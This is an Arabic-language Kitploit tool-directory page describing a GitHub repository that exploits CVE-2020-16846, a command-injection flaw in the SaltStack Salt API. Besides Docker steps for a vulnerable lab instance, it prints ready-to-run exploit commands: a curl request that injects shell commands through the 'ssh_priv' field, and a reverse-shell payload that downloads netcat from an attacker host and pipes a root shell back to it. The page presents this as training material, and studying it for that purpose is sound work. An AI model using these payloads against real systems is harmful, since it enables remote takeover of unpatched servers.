Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-16846-Saltstack-Salt-API | Kitploit
أدوات/GitHubGitHub/zomy22/cve-2020-16846-saltstack-salt-api
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubzomy22/cve-2020-16846-saltstack-salt-api

CVE-2020-16846-Saltstack-Salt-API

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
منذ 4 سنواتلم تتم المراجعة بعد

CVE-2020-16846-Saltstack-Salt-API

شرح الثغرة: تم اكتشاف مشكلة في SaltStack Salt حتى الإصدار 3002. يمكن أن يؤدي إرسال طلبات ويب مصممة بعناية إلى Salt API، مع تمكين عميل SSH، إلى حقن أوامر. يمكن العثور على تفاصيل هذه الثغرة هنا:

https://www.zerodayinitiative.com/blog/2020/11/24/detailing-saltstack-salt-command-injection-vulnerabilities

لأغراض التدريب والتعلم، قررت إنشاء مثيل ضعيف واستغلاله.

الإصدار القابل للاستغلال: https://github.com/saltstack/salt/releases/tag/v3002

تم الاختبار على Ubuntu 20.04.03

التعليمات

استخدم Dockerfile لإنشاء مثيل ضعيف في Docker.

قم بتشغيل salt_setup.sh إذا كنت تريد إنشاء مثيل ضعيف على جهاز Ubuntu ظاهري.

بناء الصورة

docker build -t salt-image .

قم بتشغيل الحاوية وكشف المنافذ (المنفذ 8080 هو الوحيد المطلوب فعليًا للاستغلال)

docker run -p4506:4506 -p4505:4505 -p8000:8000 -it salt-image:latest

api

الاستغلال

curl -i $salt_ip_addr:$salt_api_port/run -H "Content-type: application/json" -d '{"client":"ssh","tgt":"A","fun":"B","eauth":"C","ssh_priv":"|id>/tmp/test #"}'

reverse_shell

شل عكسي

root@kitploit:~
root@kali:~# curl -i $salt_ip_addr:$salt_api_port/run -H "Content-type: application/json" -d '{"client":"ssh","tgt":"A","fun":"B","eauth":"C","ssh_priv":"| /usr/bin/wget http://$attacker_ip/nc -O /root/nc; chmod +x /root/nc; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|/root/nc $attacker_ip $listener_port >/tmp/f  #"}'

pwned

تنزيل الأداة